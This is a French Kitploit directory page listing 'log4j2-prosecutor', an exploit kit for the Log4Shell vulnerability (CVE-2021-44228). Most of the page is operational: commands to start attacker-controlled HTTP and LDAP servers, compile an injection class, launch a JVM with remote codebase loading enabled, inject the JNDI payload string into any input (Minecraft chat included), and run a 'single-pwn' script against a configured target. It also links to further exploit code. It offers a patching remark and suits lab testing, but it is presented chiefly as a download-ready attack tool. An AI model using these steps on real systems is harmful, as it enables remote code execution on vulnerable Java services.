Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
log4j2-prosecutor — CVE-2021-44228 | Kitploit
Outils/GitHubGitHub/rodfer0x80/log4j2-prosecutor
Payload GenerationVulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubrodfer0x80/log4j2-prosecutor

log4j2-prosecutor

CVE-2021-44228

Voir le dépôt
il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

log4j2-prosecutor

Motivation

Cette vulnérabilité fondamentale a été signalée par [CVE-2018-3149](https://nvd.nist.gov/vuln/detail/CVE-2018-3149) et corrigée par [cet article. (8u121 Release Notes)](https://www.oracle.com/java/technologies/javase/8u121-relnotes.html)

Cependant, la bibliothèque de journalisation pour Java appelée log4j2 possédait (JNDILookup)[CVE-2021-44228](https://github.com/apache/logging-log4j2/blob/20f9a97dbe5928c3b5077bcdd2a22ac92e941655/log4j-core/src/main/java/org/apache/logging/log4j/core/lookup/JndiLookup.java), qui permettait l'accès à des protocoles tels que LDAP, ce qui permettait l'injection de code dans les anciennes versions de Java.

Les versions corrigées de Java peuvent empêcher l'injection de code, mais `JNDILookup` effectue une requête vers le serveur LDAP, ce qui peut entraîner des fuites d'IP.

La solution consiste à mettre à jour les versions de **Java** et **log4j2**.

Exécution

  1. Installer les dépendances
root@kitploit:~
cd http-server && npm install && cd ../ldap-server && npm install
  1. Lancer http-server et ldap-server tous les deux
root@kitploit:~
cd http-server && node index.js &
cd ldap-server && node index.js
  1. Compiler Main.java
root@kitploit:~
# Ceci générera Main.java – nécessaire pour l'injection de code.
# OSx
./java-single-compile <Main.java>
# Linux 
javac <Main.java>
  1. Démarrer la JVM avec les paramètres
root@kitploit:~
# Vous pouvez toujours utiliser log4j-client dans le dépôt pour les tests internes.
cd log4j-client &&\
		gradle jar &&\
		java -Dcom.sun.jndi.ldap.object.trustURLCodebase=true -jar build/libs/log4j-client-1.0-SNAPSHOT.jar
# Ou exécutez une autre application, com.sun.jndi.ldap.object.trustURLCodebase=true est requis pour l'injection de code, sinon elle ne fera qu'une requête au serveur LDAP.
java -Dcom.sun.jndi.ldap.object.trustURLCodebase=true -jar <javafile.jar>
  1. Envoyer la charge utile (payload) à n'importe quel paramètre en tant que charge utile (Dans Minecraft, il suffit de discuter pour que cela fonctionne si l'exploit est opérationnel.)
root@kitploit:~
${jndi:ldap://127.0.0.1:3001/}
  1. Nettoyage
root@kitploit:~
NODEP=`pgrep node`
for id in $NODEP; do
    kill $id
done

Scripts

root@kitploit:~
# Exploitation d'une cible unique
# Modifier exploit-configs.txt avec l'URL et les paramètres
cd scripts/single-pwn && python3 __main__.py

Références

  • https://github.com/apache/logging-log4j2/pull/608
  • https://www.lunasec.io/docs/blog/log4j-zero-day/
  • https://github.com/NCSC-NL/log4shell
  • https://github.com/ilsubyeega/log4j2-exploits/
  • https://raw.githubusercontent.com/ferderplays/Log4j_exploit/main/Exploit.java
  • https://www.blumira.com/analysis-log4shell-local-trigger/ (todo)

Licence [GPL3]

Voir la licence dans LICENSE

Télécharger l’outil